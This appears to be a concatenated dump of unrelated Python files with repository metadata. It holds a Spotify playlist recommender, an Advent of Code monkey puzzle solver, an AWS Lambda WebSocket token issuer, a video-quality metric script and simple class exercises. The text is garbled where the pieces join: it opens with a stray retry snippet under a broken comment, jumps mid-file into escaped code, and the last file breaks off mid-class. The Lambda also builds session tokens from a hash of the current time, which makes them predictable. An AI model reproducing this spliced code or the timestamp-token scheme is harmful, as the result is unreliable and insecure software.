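# place of self.sp.audio_features:
import random

def flaky_fetch(chunk):            # stand-in for self.sp.audio_features(chunk)
    if random.random() < 0.5:
        raise ConnectionError('transient failure')
    return [{'id': uri} for uri in chunk]

for attempt in range(5):
    try:
        result = flaky_fetch(['uri1', 'uri2'])
    except ConnectionError as e:
        print(f'attempt {attempt + 1} failed: {e}')
    else:
        break                      # success: the for-else below is skipped
else:
    print('all attempts failed')   # runs only when the loop never hit break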
self.sp.current_user_saved_tracks()\n tracks = results['items']\n while results['next']:\n results = self.sp.next(results)\n tracks.extend(results['items'])\n\n songs_df = pd.json_normalize(tracks, record_path=['track', 'artists'], meta=[['added_at'], ['track', 'id'], ['track', 'name']])\n songs_df = songs_df.drop_duplicates(subset='track.id', keep=\"first\")\n songs_df['added_at'] = pd.to_datetime(songs_df['added_at'])\n songs_df = songs_df.sort_values(by='added_at', ascending=True).set_index('added_at')\n songs_df = songs_df[['name', 'id', 'track.id', 'track.name']]\n songs_df.rename(columns={'track.id':'uri', 'track.name': 'song', 'name': 'artist', 'id': 'artist_uri'}, inplace=True)\n self.artist_uri = songs_df['artist_uri'].tolist()\n self.log_output('Found unique tracks: ' + str(len(songs_df)))\n return songs_df\n \n # GET TRACK ID FROM TRACK NAME IN TRACK DATA BASE\n # Get the audio features for the track \n # drop the track id from this new filtered dataframe\n def get_track_uri_from_track_name(self):\n #self.log_output('Getting track uri from track name: ' + track_name)\n #df = self.tracks_df[self.tracks_df['track_name'].str.lower() == self.song_name.lower()]['track_uri'].values[0]\n return self.tracks_df[self.tracks_df['track_name'].str.lower() == self.song_name.lower()]['track_uri'].values[0]\n \n def get_audio_features_from_track_name(self, track_name):\n \n track_id = self.tracks_df[self.tracks_df['track_name'].str.lower() == track_name.lower()]['track_id'].values[0]\n # get audio features from track id\n audio_feats_df = self.features_df[self.features_df['track_id'] == track_id].copy()\n audio_feats_df.drop(columns='track_id', inplace=True)\n self.new = np.array(audio_feats_df).reshape(1, -1)\n return self.new\n\n # Get labels from model and predict user cluster\n def get_top_n_playlist_track(self, metric='cityblock', similar=True):\n try:\n self.new\n except:\n self.get_audio_features_from_track_name(self.song_name)\n self.user_cluster = self.model.predict(self.new)\n \n # Slice df for the predicted cluster and get Playlist IDs (PIDs)\n df_slice = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]]\n df_slice = df_slice.drop(['cluster'], axis=1)\n indices = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]].reset_index()['index'].to_numpy() # PIDs for the cluster\n \n # Convert df slice to numpy, compute similarities and grab the top n PIDs\n sliced_data_array = df_slice.to_numpy()\n if similar:\n simi = cdist(sliced_data_array, self.new, metric=metric).argsort(axis=None)[:10]\n else:\n simi = cdist(sliced_data_array, self.new, metric=metric).argsort(axis=None)[-10:]\n self.song_top_playlists = indices[simi]\n\n return self.song_top_playlists\n\n \n\n def get_tracks_audio_features(self): \n \"Extract audio features from each track from the user's favorite tracks and return a dataframe\"\n songs_df = self.get_tracks_from_playlist_or_user_favorites()\n if self.len_of_favs == 'last_month':\n songs_df = songs_df.last('1M')\n elif self.len_of_favs == '6_months':\n songs_df = songs_df.last('6M')\n else:\n pass\n\n track_uris = songs_df['uri'].tolist()\n audio_feats_df = self.get_audio_features_df(track_uris_list=track_uris)\n self.songs_feats_df = songs_df.merge(audio_feats_df, how='right', on=\"uri\")\n\n def get_raw_y(self):\n \"Get user 'y' vector without scaling\"\n try:\n self.songs_feats_df\n except:\n self.get_tracks_audio_features()\n\n self.raw_y = 
self.songs_feats_df[self.feat_cols_user].mean()\n return self.raw_y\n\n def get_scaled_y_vector(self):\n \"Get user 'y' vector after scaling in a numpy array with shape of (1,n)\"\n try:\n self.raw_y # Checks if it exist else runs the function to get the variable\n except:\n self.get_raw_y()\n \n self.scaled_y = self.scaler.transform(np.array(self.raw_y).reshape(1,-1))\n return self.scaled_y\n\n def get_top_n_playlists(self, n=10, metric='cityblock', similar=True, printing=False):\n \"\"\"\n This function will compute the most similar or disimilar playlists given a target vector 'y' which represents the mean\n features of the user's favorite songs. Similarity is calculated based on metrics such as Cosine, Manhattan, Euclidean, etc.\n Parameters:\n - model: Trained clustering model.\n - train_data_scaled_feats_df (dataframe): Dataframe with scaled data for all the training data\n - playlists (dictionary): Dictionary with all the playlists from the .json files\n - scaled_y (np.array): user's favorite songs scaled vector\n - n (int): top n playlists to retrieve\n - metric (str): metric to use, recommended 'cityblock', 'euclidean', 'cosine'.\n - similar (bool): whether to calculate most similar or most disimilar \n - printing (bool): whether to print the results or not\n Output:\n - top_playlists (np.array): indices of the top n playlists based on the train_data_scaled_feats_df dataframe\n \n \"\"\"\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n\n # Get labels from model and predict user cluster\n self.user_cluster = self.model.predict(self.scaled_y)\n \n # Slice df for the predicted cluster and get Playlist IDs (PIDs)\n df_slice = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]]\n df_slice = df_slice.drop(['cluster'], axis=1)\n indices = self.train_data_scaled_feats_df[self.train_data_scaled_feats_df['cluster']==self.user_cluster[0]].reset_index()['index'].to_numpy() # PIDs for the cluster\n \n # Convert df slice to numpy, compute similarities and grab the top n PIDs\n sliced_data_array = df_slice.to_numpy()\n if similar:\n simi = cdist(sliced_data_array, self.scaled_y, metric=metric).argsort(axis=None)[:n]\n else:\n simi = cdist(sliced_data_array, self.scaled_y, metric=metric).argsort(axis=None)[-n:]\n self.top_playlists = indices[simi]\n \n if printing:\n for idx in self.top_playlists:\n self.log_output('---')\n self.log_output('Playlist: {}\\tpid:{}'.format(self.playlists_df[self.playlists_df['pid'] == idx]['name'].iloc[0], idx))\n ratings_df = self.ratings_df[self.ratings_df['pid'] == idx].copy()\n tracks_df = self.tracks_df[self.tracks_df['track_id'].isin(ratings_df['track_id'].values)].copy()\n for _, song in tracks_df.iloc[0:3].iterrows():\n self.log_output('Artist: {}\\t Song:{}'.format(song['artist_name'], song['track_name']))\n self.log_output('---')\n \n return self.top_playlists\n\n def get_songs_recommendations(self,n=30, printing=False):\n \"\"\"\n This function computes the variance, of each song in the given playlists, to the user's favorite songs (raw_y)\n Parameters:\n - n (int): number of songs to recommend, default to 30.\n - printing (bool): Flag to print or not the song recommendations, default to False.\n \"\"\"\n try:\n self.top_playlists\n except:\n self.get_top_n_playlists(printing=True)\n\n playlist_audio_features_df = self.get_audio_features_df(playlist_pids_list=self.top_playlists)\n array_audio_feats = playlist_audio_features_df[self.feat_cols_user].to_numpy()\n \n y_vector = 
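# Standalone sketch of the similarity step in get_top_n_playlists above:
# take the rows belonging to the predicted cluster, measure each row's
# distance to the user vector with scipy's cdist, and keep the n closest
# indices. Synthetic data stands in for the scaled playlist feature matrix.
import numpy as np
from scipy.spatial.distance import cdist

rows = np.random.rand(100, 13)     # cluster members: 13 scaled audio features
y = np.random.rand(1, 13)          # the user's scaled mean-feature vector
dists = cdist(rows, y, metric='cityblock').ravel()
top_n = dists.argsort()[:10]       # row indices of the 10 most similar
print(top_n)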
np.array(self.raw_y).reshape(1,-1)\n low_variance_indices = np.sum(np.square((y_vector-array_audio_feats)),axis=1).argsort(axis=None)\n self.song_uris = playlist_audio_features_df.loc[low_variance_indices]['uri']\n self.song_uris.drop_duplicates(inplace=True)\n self.song_uris = self.song_uris[:n]\n\n if printing:\n for uri in self.song_uris:\n print('Song: {}'.format(self.sp.track(uri)['name']))\n print('Artist: {}\\n'.format(self.sp.track(uri)['artists'][0]['name']))\n\n return self.song_uris\n \n # Get audio features form a song name\n def get_song_recommendation_from_song_name(self, n=30, printing=False):\n \"\"\"\n This function computes the variance, of each song in the given playlists, to the user's favorite songs (raw_y)\n Parameters:\n - song_name (str): name of the song to recommend\n - n (int): number of songs to recommend, default to 30.\n - printing (bool): Flag to print or not the song recommendations, default to False.\n \"\"\"\n try:\n self.song_top_playlists \n except:\n self.get_top_n_playlist_track()\n\n playlist_audio_features_df = self.get_audio_features_df(playlist_pids_list=self.song_top_playlists)\n array_audio_feats = playlist_audio_features_df[self.feat_cols_user].to_numpy()\n \n y_vector = self.new\n low_variance_indices = np.sum(np.square((y_vector-array_audio_feats)),axis=1).argsort(axis=None)\n self.song_uris = playlist_audio_features_df.loc[low_variance_indices]['uri']\n self.song_uris.drop_duplicates(inplace=True)\n self.song_uris = self.song_uris[:n]\n\n if printing:\n for uri in self.song_uris:\n print('Song: {}'.format(self.sp.track(uri)['name']))\n print('Artist: {}\\n'.format(self.sp.track(uri)['artists'][0]['name']))\n\n return self.song_uris\n\n def build_spotify_playlist(self, playlist_name='Machine Learning Playlist', \n description='Hell yeah, this is a Machine Learning Playlist generated on {}'.format(datetime.date.today().strftime(\"%B %d, %Y\"))):\n \"\"\"\n Build and Publish Spotify Playlist\n Parameters:\n - playlist_name (str): Name of playlist.\n - decription (str): Description of playlist.\n - target (str): 'user' or 'playlist', user will use user's favorite tracks and playlist will \n \"\"\"\n try:\n self.song_uris\n except:\n self.get_songs_recommendations()\n\n items = self.song_uris.to_list()\n #user_id = self.sp.current_user()['id']\n #new_playlist = self.sp.user_playlist_create(user_id, playlist_name, description=description)\n #self.sp.playlist_add_items(new_playlist['id'],items=items)\n return items\n\n\n def get_genre_wordcloud_fig(self):\n \"Get Spotify Wrapped for current user\"\n try:\n self.artist_uri\n except:\n self.get_tracks_from_playlist_or_user_favorites()\n\n if self.playlist_uri is None:\n user = self.sp.current_user()['display_name']\n followers = self.sp.current_user()['followers']['total']\n self.log_output(\"Hello {}!\".format(user))\n self.log_output(\"We are happy that you are using our product. Let's see some of your personal Spotify stats.\\n\")\n\n if followers >= 1:\n self.log_output(\"At this moment you have a total of {} followers, that's not bad at all!\\nThey know you have an amazing music taste.\\n\".format(followers))\n else:\n self.log_output(\"Ouch, at this moment you don't have any followers, let me know if you want me to follow you. 
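# The publishing calls are left commented out in build_spotify_playlist
# above; this is the uncommented shape of that flow using the same spotipy
# methods. `sp` stands for an authorized spotipy.Spotify client with a
# playlist-modify scope, and the track URI shown is a placeholder.
items = ['spotify:track:4uLU6hMCjMI75M1A2tKUQC']   # hypothetical track URIs
user_id = sp.current_user()['id']
new_playlist = sp.user_playlist_create(user_id, 'Machine Learning Playlist',
                                       description='generated playlist')
sp.playlist_add_items(new_playlist['id'], items=items)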
I'll be happy to see what type of music you listen to.\\n\")\n\n top_artists = []\n genres = []\n try:\n for artist in self.sp.current_user_top_artists(time_range='long_term')['items']:\n top_artists.append(artist['name'])\n genres.append(artist['genres'])\n self.log_output(\"These are your top artist of all time:\")\n for i in top_artists[:5]:\n self.log_output(i)\n self.log_output(\"\\n\")\n except:\n self.log_output(\"Ooops, it seems that you don't have top artists at the moment.\\n\")\n\n try:\n self.log_output(\"And these are your top tracks of all time:\")\n for i in self.sp.current_user_top_tracks(time_range='long_term')['items'][:5]:\n self.log_output(\"{} - {}\".format(i['name'], i['artists'][0]['name']))\n except:\n self.log_output(\"Ooops, it seems that you don't have top tracks at the moment.\\n\")\n\n genres = []\n for artist in self.artist_uri:\n genres.append(self.sp.artist(artist)['genres'])\n\n text = [item for sublist in genres for item in sublist]\n text = ' '.join(text)\n wc = WordCloud(background_color ='white',relative_scaling=0, width=500, height=500, colormap=self.color).generate(text)\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.imshow(wc, interpolation='bilinear')\n ax.axis(\"off\")\n ax.title.set_text('Genres you listen to the most\\n')\n return fig\n\n def get_playlist_wordcloud_fig(self): \n # User Playlist Cluster\n text = ' '.join(self.playlists_df[self.playlists_df['cluster']==self.user_cluster[0]][\"name\"])\n wc = WordCloud(background_color ='white',relative_scaling=0, width=500, height=500, colormap=self.color).generate(text)\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n ax.imshow(wc, interpolation='bilinear')\n ax.axis(\"off\")\n ax.title.set_text('Playlist names in your cluster {}\\n'.format(self.user_cluster))\n return fig\n\n def get_user_cluster_all_fig(self):\n # Transform user fav songs to TSNE to plot in vector space\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n try:\n self.user_cluster\n except:\n self.user_cluster = self.model.predict(self.scaled_y)\n \n user_tsne = self.tsne_transformer.transform(self.scaled_y)[0]\n\n # Blob all clusters\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n sns.scatterplot(ax=ax, x='X', y='Y', hue='cluster', style='cluster', data=self.openTSNE_df, legend=None)\n ax.scatter(x=user_tsne[0], y=user_tsne[1], color='yellow', marker='*', s=500)\n ax.title.set_text('You (Star) are here in the 17 Clusters')\n return fig\n #plt.show()\n\n def get_user_cluster_single_fig(self):\n try:\n self.scaled_y\n except:\n self.get_scaled_y_vector()\n try:\n self.user_cluster\n except:\n self.user_cluster = self.model.predict(self.scaled_y)\n \n user_tsne = self.tsne_transformer.transform(self.scaled_y)[0]\n\n # Blob user cluster\n palette = {c:'purple' if c==self.user_cluster else 'darkgrey' for c in self.openTSNE_df.cluster.unique()}\n fig, ax = plt.subplots(1, 1, figsize=(5, 5))\n sns.scatterplot(ax=ax, x='X', y='Y', hue='cluster', style='cluster', data=self.openTSNE_df, legend=None, palette=palette)\n ax.scatter(x=user_tsne[0], y=user_tsne[1], color='yellow', marker='*', s=500)\n ax.title.set_text('You are in cluster {}'.format(self.user_cluster))\n return fig\n #plt.show()\n\n def __str__(self):\n return 'Spotify Recommender System with model: {} on {} playlists.'.format(self.model, len(self.train_data_scaled_feats_df))\n\n# Examples on how to use it\n# Need to call SpotifyRecommendations with the given paths for the models and data\n#x = SpotifyRecommendations(model_path, tsne_path, scaler_path, 
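# Minimal reproduction of the word-cloud figure construction shared by
# get_genre_wordcloud_fig and get_playlist_wordcloud_fig above, with toy
# genre text in place of the Spotify-derived strings.
import matplotlib.pyplot as plt
from wordcloud import WordCloud

text = 'rock indie rock metal pop indie jazz rock'   # toy genre text
wc = WordCloud(background_color='white', relative_scaling=0,
               width=500, height=500).generate(text)
fig, ax = plt.subplots(1, 1, figsize=(5, 5))
ax.imshow(wc, interpolation='bilinear')
ax.axis('off')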
playlists_path, train_data_scaled_path)\n\n# This will build a playlist based on the current user logged in\n#x.build_spotify_playlist()\n\n# This will build a playlist based on a playlist\n#x.build_spotify_playlist(playlist='71vjvXmodX7GgWNV7oOb64')\n\n# Fine tune the recommendations\n# n: number of similar playlists\n# metric: type of metric, you can try 'euclidean', 'cosine', 'cityblock'\n# similar: True for similar False for longest distance but still within the same cluster\n\n#x.get_top_n_playlists(n=10, metric='cityblock', similar=True, printing=False) # Fine tune for current user\n# After tuning, run againn build_spotify_playlist() or build_spotify_playlist()\n\n# Examples:\n#x.build_spotify_playlist(playlist='71vjvXmodX7GgWNV7oOb64') # From a previously generated playlist\n#x.build_spotify_playlist(playlist_name = 'On User') # On current user but giving a playlist name\n#x.build_spotify_playlist(playlist_name = 'Metal Essentials', playlist='37i9dQZF1DWWOaP4H0w5b0') # Based on a Metal essentials playlist\n#x.build_spotify_playlist(playlist_name = 'Classical Essentials', playlist='37i9dQZF1DWWEJlAGA9gs0') # Based on a Classical essentials playlist\n#x.build_spotify_playlist() # On current user with default values\n#x.get_genre_wordcloud_fig()\n\nclass SpotifyAPI(object):\n access_token = None\n access_token_expires = datetime.datetime.now()\n access_token_did_expire = True\n client_id = None\n client_secret = None\n token_url = \"https://accounts.spotify.com/api/token\"\n\n def __init__(self, client_id, client_secret, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.client_id = client_id\n self.client_secret = client_secret\n\n def get_client_credentials(self):\n #Returns a base64 encoded string\n client_id = self.client_id\n client_secret = self.client_secret\n if client_secret == None or client_id == None:\n raise Exception(\"You must set client_id and client_secret\")\n client_creds = f\"{client_id}:{client_secret}\"\n client_creds_b64 = base64.b64encode(client_creds.encode())\n return client_creds_b64.decode()\n\n def get_token_headers(self):\n client_creds_b64 = self.get_client_credentials()\n return {\n \"Authorization\": f\"Basic {client_creds_b64}\" \n }\n\n def get_token_data(self):\n return {\n \"grant_type\": \"client_credentials\"\n }\n\n def perform_auth(self):\n token_url = self.token_url\n token_data = self.get_token_data()\n token_headers = self.get_token_headers()\n r = requests.post(token_url, data=token_data, headers=token_headers)\n if r.status_code not in range(200, 299): \n raise Exception(\"Could not authenticate client\")\n #return False\n data = r.json()\n now = datetime.datetime.now()\n access_token = data['access_token']\n expires_in = data['expires_in'] # seconds\n expires = now + datetime.timedelta(seconds=expires_in)\n self.access_token = access_token\n self.access_token_expires = expires \n self.access_token_did_expire = expires < now\n return True\n \n def get_access_token(self):\n token = self.access_token\n expires = self.access_token_expires\n now = datetime.datetime.now()\n if expires < now:\n self.perform_auth()\n return self.get_access_token()\n elif token == None:\n self.perform_auth()\n return self.get_access_token()\n return token\n\n def get_resource_header(self):\n access_token = self.get_access_token()\n headers = {\n \"Authorization\": f\"Bearer {access_token}\"\n } \n return headers\n\n def base_search(self, query_params):\n headers = self.get_resource_header()\n #print(headers)\n endpoint = 
\"https://api.spotify.com/v1/search\"\n lookup_url = f\"{endpoint}?{query_params}\"\n #print(lookup_url)\n r = requests.get(lookup_url, headers=headers)\n if r.status_code not in range(200, 299):\n return {}\n #print(r.json())\n return r.json()\n\n def search(self, query=None, operator=None, operator_query=None, search_type='playlist'):\n if query == None:\n raise Exception(\"A query is required\")\n if isinstance(query, dict):\n query = \" \".join([f\"{k}:{v}\" for k,v in query.items()])\n if operator != None and operator_query != None:\n if operator.lower() == \"or\" or operator == \"not\":\n operator = operator.upper()\n if isinstance(operator_query, str):\n query = f\"{query} {operator} {operator_query}\"\n query_params = urlencode({\"q\": query, \"type\": search_type.lower()})\n #print(query_params)\n return self.base_search(query_params)\n \n","repo_name":"kshitijzutshi/DAMG7245-Final-Project","sub_path":"streamlit/spotipy_client.py","file_name":"spotipy_client.py","file_ext":"py","file_size_in_byte":38496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"347884913","text":"import re\n\nwith open(\"AdventOfCode_2022/Day11/input.txt\", \"r\") as fp:\n input = [line.rstrip() for line in fp.readlines()]\n\nthings = []\nfor i in range(0, len(input), 7):\n things.append(input[i:i+6])\n\nsplitted_things = []\nfor thing in things:\n splitted_thing = []\n for line in thing:\n splitted_thing.append(line.split())\n splitted_things.append(splitted_thing)\n\n\nclass Monkey:\n def __init__(self, id, items, operation, test, monkey_true, monkey_false):\n self.id = id\n self.items = items\n self.operator = operation[0]\n self.num = operation[1]\n self.test = test\n self.monkey_true = monkey_true\n self.monkey_false = monkey_false\n self.thrown_items = 0\n\n def inspect(self):\n item = self.items[0]\n operator = self.operator\n if self.num == 'old':\n num = item\n else:\n num = int(self.num)\n if operator == '+':\n self.items[0] = item + num\n return self.items[0]\n if operator == '*':\n self.items[0] = item * num\n return self.items[0]\n\n def get_bored(self):\n self.items[0] = self.items[0] // 3\n return self.items[0]\n\n def throw_to(self):\n if self.items[0] % int(self.test) == 0:\n return self.monkey_true\n else:\n return self.monkey_false\n\n def __str__(self):\n return 'Name: ' + self.id + ' Items: ' + str(self.items) + ' Thrown shit: ' + str(self.thrown_items)\n\n\ndef get_items(items_raw):\n items = []\n for i in range(2, len(items_raw)):\n items.append(int(re.findall(r'\\d+', items_raw[i])[0]))\n return items\n\n\ndef get_operation(operation_raw):\n operation = []\n operation.extend([operation_raw[4], operation_raw[5]])\n return operation\n\n\ndef throw_item(item, monkey_from, monkey_to, monkeys):\n monkeys[monkey_from].items.pop(0)\n monkeys[monkey_to].items.append(item)\n monkeys[monkey_from].thrown_items += 1\n\n\ndef init_monkey(monkey_raw):\n monkid = monkey_raw[0][1][:-1]\n items = get_items(monkey_raw[1])\n print(items)\n operation = get_operation(monkey_raw[2])\n test = monkey_raw[3][3]\n monkey_true = monkey_raw[4][5]\n monkey_false = monkey_raw[5][5]\n return Monkey(monkid, items, operation, test, monkey_true, monkey_false)\n\n\ndef init_monkeys(input):\n monkeys = []\n for monkey_raw in input:\n monkeys.append(init_monkey(monkey_raw))\n return(monkeys)\n\n\ndef play_round(monkey, monkeys):\n items = monkey.items\n while len(items) > 0:\n print('inspected:', monkey.items[0], ' now: ', monkey.inspect())\n print('bored 
division:', monkey.get_bored())\n print('throw ', monkey.items[0], ' to monkey:', monkey.throw_to())\n throw_item(monkey.items[0], int(monkey.id),\n int(monkey.throw_to()), monkeys)\n\n\nmonkeys = init_monkeys(splitted_things)\n\nfor _ in range(20):\n for monkey in monkeys:\n play_round(monkey, monkeys)\n\nresult = [monkey.thrown_items for monkey in monkeys]\nresult.sort(reverse=True)\n\nmonkey_business = result[0]*result[1]\n\nprint(monkey_business)\n# print([str(monkey) for monkey in monkeys])\n","repo_name":"Sookie188/AdventOfCode","sub_path":"AdventOfCode_2022/Day11/Day11_1.py","file_name":"Day11_1.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71968572257","text":"import boto3\nimport datetime\nimport hashlib\nimport json\n\ndynamodb = boto3.resource('dynamodb')\nconnections = dynamodb.Table('flexible-reversi-tokens')\n\ndef lambda_handler(event, context):\n # クライアントの宛先情報(WebSocketの接続ID)\n connectionId = event.get('requestContext', {}).get('connectionId')\n \n # クライアントの宛先情報(API GatewayのURL)\n domainName = event.get('requestContext',{}).get('domainName')\n stage = event.get('requestContext',{}).get('stage')\n endpointUrl = F\"https://{domainName}/{stage}\"\n \n # 現在時刻\n now = datetime.datetime.now()\n nowString = (now.strftime('%Y-%m-%d %H:%M:%S.%f'))\n print(nowString)\n \n # トークンの有効期限\n expirationDatetime = now + datetime.timedelta(hours=3)\n \n # 現在時刻から新規にトークンを生成する。トークンは以後の通信でクライアントの識別に用いる。\n token = hashlib.sha256(nowString.encode('utf-8')).hexdigest()\n print(token)\n \n # トークン、API Gateway URL、トークン有効期限、WebSocket 接続ID、をDBに保存する。\n response = connections.put_item(Item={\n 'token': token,\n 'endpointUrl': endpointUrl,\n 'expirationDatetime': int(expirationDatetime.timestamp()),\n 'connectionId': connectionId,\n 'nickname': ''\n })\n print(response)\n \n # クライアントにトークンを送る。\n am = boto3.client('apigatewaymanagementapi', endpoint_url=endpointUrl)\n _ = am.post_to_connection(ConnectionId=connectionId, Data=json.dumps({\"dataType\":\"newToken\", \"data\":{\"token\": token}}))\n \n return {\n 'statusCode': 200,\n 'body': json.dumps('new token generated.')\n }\n","repo_name":"kusa-mochi/flexible-reversi","sub_path":"server-side/lambda/flexibleReversiNewToken/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42797427353","text":"import block as Blockiness\nimport blurv3 as Blurriness\nimport contrastAndColorMetric as CCMetric\nimport noisev1 as Noise\nimport nrqe_metrics as NRQEmetrics\nimport frameExtraction\nimport os.path\nimport cv2\nimport brisque\nimport numpy as np\nimport time\nimport csv\n\ndef addFrameStats(input_list, out_list):\n out_list.append( np.average(input_list) )\n out_list.append( np.max(input_list) )\n out_list.append( np.min(input_list) )\n\ndef frameQualityLoop(framesfolder_path, vidname):\n brisq = brisque.BRISQUE()\n\n # lists of each frame's metrics\n blockiness_list = []\n blurriness_list = []\n color_list = [ [], [], [], [], [], [], [], []]\n contrast_list = [ [], [], [], [], [], [], [], [], []]\n noise_list = []\n brisque_list = []\n\n # list of each frame's pixel values\n frame_data = []\n\n frame_list = os.listdir(framesfolder_path)\n frame_list.sort()\n \n start_time = time.perf_counter()\n j = 1\n for frame in frame_list:\n time_elapsed = time.perf_counter() - start_time\n if (time_elapsed) > (60 * 
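# English gloss of the Japanese comments in lambda_function.py above, in
# order: client address info (the WebSocket connection ID); client address
# info (the API Gateway URL); current time; token expiry; generate a new
# token from the current time, used to identify the client in later
# messages; save the token, API Gateway URL, expiry, and WebSocket
# connection ID to the DB; send the token to the client.
#
# Hedged sketch of the same put_item / post_to_connection pair with boto3;
# the table name mirrors the source, the endpoint and values are illustrative.
import json
import boto3

table = boto3.resource('dynamodb').Table('flexible-reversi-tokens')
table.put_item(Item={'token': 'abc123', 'endpointUrl': 'https://example.execute-api/prod',
                     'expirationDatetime': 1700000000, 'connectionId': 'cid-1', 'nickname': ''})
api = boto3.client('apigatewaymanagementapi', endpoint_url='https://example.execute-api/prod')
api.post_to_connection(ConnectionId='cid-1',
                       Data=json.dumps({'dataType': 'newToken', 'data': {'token': 'abc123'}}))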
j):\n print(\"frame: \", frame)\n print(\"time_elapsed: \", time_elapsed)\n j += 1\n #start_frame = time.perf_counter()\n full_path = framesfolder_path + frame\n\n # some metrics require frame to already be read with opencv\n cv_frame = cv2.imread(full_path)\n # some metrics require an array of frame data. So build it\n frame_data.append(cv_frame)\n \n blockiness_list.append( Blockiness.block(cv_frame) )\n blurriness_list.append( Blurriness.sobel_blur(cv_frame) ) \n # calculateCS returns a list with 8 values\n color_metrics = CCMetric.calculateCS(full_path)\n for i in range( len(color_metrics) ):\n color_list[i].append(color_metrics[i])\n noise_list.append( Noise.noise(cv_frame) )\n # BRISQUE output is 0-100. Easy to normalize now\n brisque_list.append( brisq.get_score(cv_frame) / 100 )\n # calculateGD returns a list with 9 values\n #contrast_metrics = CCMetric.calculateGD(full_path)\n #for i in range( len(contrast_metrics) ):\n # contrast_list[i].append( contrast_metrics[i] )\n \n # VIDEO NAME\n csv_out = []\n csv_out.append( vidname )\n\n # BLOCKINESS\n addFrameStats(blockiness_list, csv_out)\n\n # BLURRINESS\n addFrameStats(blurriness_list, csv_out)\n\n # COLOR\n for i in range( len(color_list) ):\n addFrameStats(color_list[i], csv_out)\n\n # NOISE\n addFrameStats(noise_list, csv_out)\n\n # BRISQUE\n addFrameStats(brisque_list, csv_out)\n\n # FLICKERING\n np_frame_array = np.array(frame_data)\n csv_out.append( NRQEmetrics.temporalFlickering(np_frame_array) )\n\n # CONTRAST\n # for i in range( len(contrast_list) ):\n # addFrameStats(contrast_list[i], csv_out)\n\n # WRITE TO CSV\n with open('live-nrqe.csv', 'a', newline='') as csvfile:\n metric_writer = csv.writer(csvfile, delimiter=',')\n metric_writer.writerow( csv_out )\n\n print( \"Time Elapsed: \", time.perf_counter() - start_time )\n\ninput_path = \"./live-test/\"\noutput_path = \"./live-frames/\"\nsample_rate = 1000 #samples at video's fps if samplerate above fps\n\n#frameExtraction.extractFrameLoop(input_path, output_path, sample_rate)\n\nprint(\"done extracting frames\")\n\nfor frame_folder in os.listdir(output_path):\n prefix, _ = frame_folder.split('-')\n frameQualityLoop(output_path + frame_folder + \"/\", prefix + \".mp4\")","repo_name":"asexton1310/discovery-project","sub_path":"ExtraFiles/quality_extractor.py","file_name":"quality_extractor.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38863711100","text":"\"\"\" class person intoduction \"\"\"\nclass Person:\n species = 'Homo sapiens'\n count = 0\n def __init__(self,id):\n self.id = id\n @classmethod\n def show_count(cls):\n print(f'There are {cls.count} {cls.species}')\n @staticmethod\n def detais():\n pass\nclass Teacher(Person):\n def __init__(self,id):\n super().__init__(id)\n self.id += 'T'\nclass Student(Person):\n def __init__(self,id):\n super().__init__(id)\n self.id += 'S'\nclass TeachingAssistant(Student, Teacher):\n def __init__(self,id):\n super().__init__(id)\n\"\"\"class person instances \"\"\"\n\nx = TeachingAssistant('2675')\nprint(x.id)\ny = Student('4567')\nprint(y.id)\nz = Teacher('3421')\nprint(z.id)\np = Person('5749')\nprint(p.id)\n\n\"\"\"class book \"\"\"\n\nclass Book:\n def __init__(self,isbn, title,author,publisher,pages,price,copies):\n self.isbn = isbn\n self.title = title\n self.author = author\n self.publisher = publisher\n self.pages = pages\n self.price = price\n self.copies = copies\n def display(self):\n print(self.title)\n 
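# Standalone sketch of the per-metric aggregation pattern addFrameStats
# implements above: collect one value per sampled frame, then append the
# average, max, and min to the CSV row. Synthetic values stand in for the
# real blurriness scores.
import numpy as np

blurriness_list = [0.31, 0.28, 0.35, 0.30]    # one value per sampled frame
csv_out = ['clip.mp4']
csv_out += [np.average(blurriness_list), np.max(blurriness_list), np.min(blurriness_list)]
print(csv_out)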
print(f'ISBN : {self.isbn}')\n print(f'Price : {self.price}')\n print(f'Number of copies : {self.copies}')\n print('.' * 50)\n @staticmethod\n def detais():\n pass\n def in_stock(self):\n return True if self.copies>0 else False\n def sell(self):\n if self.in_stock():\n self.copies -= 1\n else:\n print('The book is out of stock')\n\n\"\"\"class book instances \"\"\"\n\nbook1 = Book('957-4-36-547417-1', 'Learn Physics','Stephen', 'CBC', 350, 200,10)\nbook2 = Book('652-6-86-748413-3', 'Learn Chemistry','Jack', 'CBC', 400, 220,20)\nbook3 = Book('957-7-39-347216-2', 'Learn Maths','John', 'XYZ', 500, 300,5)\nbook4 = Book('957-7-39-347216-2', 'Learn Biology','Jack', 'XYZ', 400, 200,6)\n\nbook1.display()\nbook2.display()\nbook3.display()\nbook4.display()\n\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\nbook3.sell()\n\n\"\"\" course class \"\"\"\n\nclass Course:\n def __init__(self, title, instructor, lectures, price):\n self.title = title\n self.instructor = instructor\n self.price = price\n self.lectures = lectures\n self.users = []\n self.ratings = 0\n self.avg_rating = 0\n def __str__(self):\n return f'{self.title} by {self.instructor}'\n @staticmethod\n def detais():\n pass\n def new_user_enrolled(self, user):\n self.users.append(user)\n def received_a_rating(self, new_rating):\n self.avg_rating = (self.avg_rating * self.ratings + new_rating)/(self.ratings + 1)\n self.ratings += 1 \n def show_details(self):\n print('Course Title : ', self.title)\n print('Intructor : ', self.instructor)\n print('Price : ', self.price)\n 